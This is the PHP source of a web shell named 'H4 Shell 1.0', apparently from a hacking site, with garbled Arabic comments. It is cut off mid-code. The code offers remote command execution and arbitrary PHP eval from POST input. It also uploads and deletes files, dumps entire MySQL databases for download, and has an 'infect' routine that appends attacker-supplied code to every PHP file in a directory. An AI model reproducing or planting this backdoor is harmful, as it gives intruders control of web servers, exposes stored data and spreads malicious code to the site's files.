|
# H4 Shell 1.0
# c0ded by H4KOOOM
# http://sa-hacker.com
# 23/05/11
# Cuz We Back Rude This Time
# Do not think you are the most genius in the world
////////////////////////////////////////////////////////////////////////////////////////
error_reporting(0);
// ÇáÏæÇá
$version = ′1.0′;
$info = $_SERVER[′SERVER_SOFTWARE′];
$page = $_SERVER[′SCRIPT_NAME′];
$site = getenv("HTTP_HOST");
$uname = php_uname();
$smod = ini_get(′safe_mode′);
if ($smod == 0) { $safemode = "OFF"; }
else { $safemode = "ON"; }
$dir = realpath($_POST[′dir′]);
$mkdir = $_POST[′makedir′];
$mydir = $_POST[′deletedir′];
$cmd = $_GET[′cmd′];
$us3r = exec(′id′);
$p0d = exec(′pwd′);
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";}
else {$openbasedir = false; $hopenbasedir = "OFF";}
$host = $_POST[′host′];
$proto = $_POST[′protocol′];
$delete = $_POST[′delete′];
$phpeval = $_POST[′php_eval′];
$db = $_POST[′db′];
$query = $_POST[′query′];
$user = $_POST[′user′];
$pass = $_POST[′passd′];
$myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
$quotes = get_magic_quotes_gpc();
if ($quotes == "1" or $quotes == "on")
{
$quot = "ON";
}
else
{
$quot = "OFF";
}
// ÇáÊÕÇÑíÍ
function getperms($fn)
{
$mode=fileperms($fn);
$perms=′′;
$perms .= ($mode & 00400) ? ′r′ : ′-′;
$perms .= ($mode & 00200) ? ′w′ : ′-′;
$perms .= ($mode & 00100) ? ′x′ : ′-′;
$perms .= ($mode & 00040) ? ′r′ : ′-′;
$perms .= ($mode & 00020) ? ′w′ : ′-′;
$perms .= ($mode & 00010) ? ′x′ : ′-′;
$perms .= ($mode & 00004) ? ′r′ : ′-′;
$perms .= ($mode & 00002) ? ′w′ : ′-′;
$perms .= ($mode & 00001) ? ′x′ : ′-′;
return $perms;
}
// ÇáÃÍÌÇã + b
$spacedir = @getcwd();
$free = @diskfreespace($spacedir);
if (!$free) {$free = 0;}
$all = @disk_total_space($spacedir);
if (!$all) {$all = 0;}
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
$percentfree = intval(($free*100)/$all);
// ãÚáæãÇÊ ÇáÓíÑÝÑ
if(isset($_POST[′phpinfo′]))
{
die(phpinfo());
}
// ÅäÔÇÁ ãáÝ
$name = htmlspecialchars($_POST[′names′]);
$src = $_POST[′source′];
if(isset($name) && isset($src))
{
if($_POST[′darezz′] != realpath(".")) { $name = $_POST[′darezz′].$name; }
$ctd = fopen($name,"w+");
fwrite($ctd, stripslashes($src));
fclose($ctd);
echo "";
$dir = $dir.$_POST[′darezz′];
chdir(realpath(′.′));
}
// ÑÝÚ ãáÝ ÊÍÊÇÌ ÊØæíÑ
$path = $_FILES[′ffile′][′tmp_name′];
$name = $_FILES[′ffile′][′name′];
if(isset($path) && isset($name))
{
if($_POST[′dare′] != realpath(".")) { $name = $_POST[′dare′].$name; }
if(move_uploaded_file($path, $name))
{
echo "";
}
else
{
echo "";
} }
// ÍÐÝ ãáÝ
if(isset($delete) && $delete != $dir)
{
if(file_exists($delete))
{
unlink($delete);
echo "";
}
}
// ÞæÇÚÏ ÇáÈíÇäÇÊ
if(isset($db) && isset($query) && isset($_POST[′godb′]))
{
$mysql = mysql_connect("localhost", $user, $pass)or die("");
$db = mysql_select_db($db)or die(mysql_error());
$queryz = mysql_query($query)or die(mysql_error());
if($query) { echo ""; }
else { echo ""; }
}
// ÇáÃÊÕÇá ÈÞæÇÚÏ ãæÞÚ [pacucci.com]
if(isset($_POST[′dump′]) && isset($user) && isset($pass) && isset($db)){
mysql_connect(′localhost′, $user, $pass);
mysql_select_db($db);
$tables = mysql_list_tables($db);
while ($td = mysql_fetch_array($tables))
{
$table = $td[0];
$r = mysql_query("SHOW CREATE TABLE `$table`");
if ($r)
{
$insert_sql = "";
$d = mysql_fetch_array($r);
$d[1] .= ";";
$SQL[] = str_replace("n", "", $d[1]);
$table_query = mysql_query("SELECT * FROM `$table`");
$num_fields = mysql_num_fields($table_query);
while ($fetch_row = mysql_fetch_array($table_query))
{
$insert_sql .= "INSERT INTO $table VALUES(";
for ($n=1;$n<=$num_fields;$n++)
{
$m = $n - 1;
$insert_sql .= "′".mysql_real_escape_string($fetch_row[$m])."′, ";
}
$insert_sql = substr($insert_sql,0,-2);
$insert_sql .= ");n";
}
if ($insert_sql!= "")
{
$SQL[] = $insert_sql;
}
}
}
$dump = "-- Database: ".$_POST[′db′] ."
";
$dump .= "-- Powered by H4 Shell
";
$dump .= "-- Http://SA-HACKER.COM
";
$dumpp = $dump.implode("r", $SQL);
$name = $db."-".date("d-m-y")."_by_H4_shell.sql";
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename = $name");
echo $dumpp;
die();
}
// ÅäÔÇÁ ãÌáÏ
if(isset($mkdir)) {
mkdir($mkdir);
if($mkdir) { echo ""; } }
// ÍÐÝ ãÌáÏ
if(isset($mydir) && $mydir != "$dir") {
$d = dir($mydir);
while($entry = $d->read()) {
if ($entry !== "." && $entry !== "..") {
unlink($entry);
}
}
$d->close();
rmdir($mydir);
}
// Eval
if(isset($phpeval)) {
$eval = @str_replace("
$eval = @str_replace("?>","",$phpeval);
@eval(stripslashes($eval));
die();
}
// ÍÞä ßæÏ ÞÇÈáÉ ááÊØæíÑ
if(isset($_POST[′inf3ct′]))
{
foreach (glob("*.php") as $lola)
{
$dira = ′.′;
$asdi = fopen($lola, ′a+′);
@fwrite($asdi, $_POST[′cod3inf′]);
@fclose($asdi);
}
if($asdi)
{
$textzz = ′Êã ÍÞä ÌãíÚ ÇáãáÝÇÊ ÈäÌÇÍ′;
}
else {
$textzz = ′ÎØÇ áã íÊã ÇáÍÞä ′;
}
}
// ÕæÑ ÇáãáÝÇÊ æÇáãÌáÏÇÊ ãÔÝÑå æãÒÑæÚÉ
if($_GET[′com′] == "image")
{
$images = array(
"folder"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAGtSURBVHjaYmRgYGBazMf3lwENxH76pA2kbgPxPyDGkIcBgABiAGr+/+/zZwwMEgfKOwExFxCzQDEzEDMi6wcIIJAgw59z5zAMjn76lIFBWnovIZcBBBDYgP/v34Ml///7x8DIxASmf+3eDTEEHUhLXwUa4ghkHQUZABBAYAP+vXnD8Pf2bYb106czEAOA3tsPMwQggCAGvH4N1ozVRlxAWhpkiAVAAEG8AHQBCPw+cgQi+RcY6H/+MPz/9Qso+Jvh/48fDP9//gTa9I/h55IlDOyhoTBjXAECCO4FsEEfPgAjlQlDM8hAOP/rV4b/Hz/CDBAGCCCIAW/fgnn/QIEJtAWMYa4A2QzUDKZBfKCB/6CBDopSgACCeOHdO4gLQCaDNP//D9EE1MAA1Ai2Hc0VMAAQQKjRCPQKKArBAKQZpBiqGWw71AXIBgAEEMSAz58ZkL0CdgFUA9ggkAFQg/8DDWX4/h2m/wdAAIGSpRYwXq8ykAiAUbgKSK0HCCCQAaxAbAjEzkAsRKR+kBMuAPFegACCZQwQzQ41jBgAyp2/QCEFEECM/0H+pQAABBgAaE8F4JYoHyAAAAAASUVORK5CYII=",
"file"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAASUExURZwAAM6urXtJSgAAAP///////0X/XP4AAAAGdFJOU///////ALO/pL8AAABDSURBVHjapI1LFgAgCAJJ4/5X7qOV1rJhNw8UJDWEIKXuiJrYlCUAJIFBHwRxTUykhh/JR0PjeSvOR6McpqAG2AQYAL10AzDbmKTEAAAAAElFTkSuQmCC",
"floppy"=> "R0lGODlhECAQILMgIB8jVq2yyI0csGVuGcjL2v///9TY405WfqOmvjI+bHoaoQsMQxR+uubn7bu+0f///yH5BAEgIA8gLCAgICAQIBAgIAR/8CHEHlVq6HMZNEUYJGFZMiACFtxpCiBDHgLjEwogzLfZDAuBw0AsEn0eIAKocAR+E0Yls1koAn2skjLFDA7WQKlBJh6z4AEiVDZneDDFrNEwE95QRHwgaFOdSlx6CwcKdndOUQxxJgZgFgIYCjALCQN/eRUWIAsPIHggoSCdESA7"
);
header("Content-type: image/gif");
header("Cache-control: public");
header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
header("Cache-control: max-age=".(60*60*24*7));
header("Last-Modified: ".date("r",filemtime(__FILE__)));
$image = $images[$_GET[′img′]];
echo base64_decode($image);
}
// ÃäæÇÚ ÇáãáÝÇÊ ( ãáÝ - ãÌáÏ )
chdir($dir);
if(!isset($dir)) { $dir = @realpath("."); }
if($dir != "/") { $dir = @realpath("."); } else { $dir = "."; }
if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;}
$pahtw = 0;
$filew = 0;
$num = 1;
if (is_dir($dir))
{
if ($open = opendir($dir))
{
if(is_dir($dir)) {
$typezz = "DIR";
$pahtw++;
}
while (($list = readdir($open)) == true)
{
if(is_dir($list)) {
$typezz = "ãÌáÏ";
$pahtw++;
$listf.= ′ |
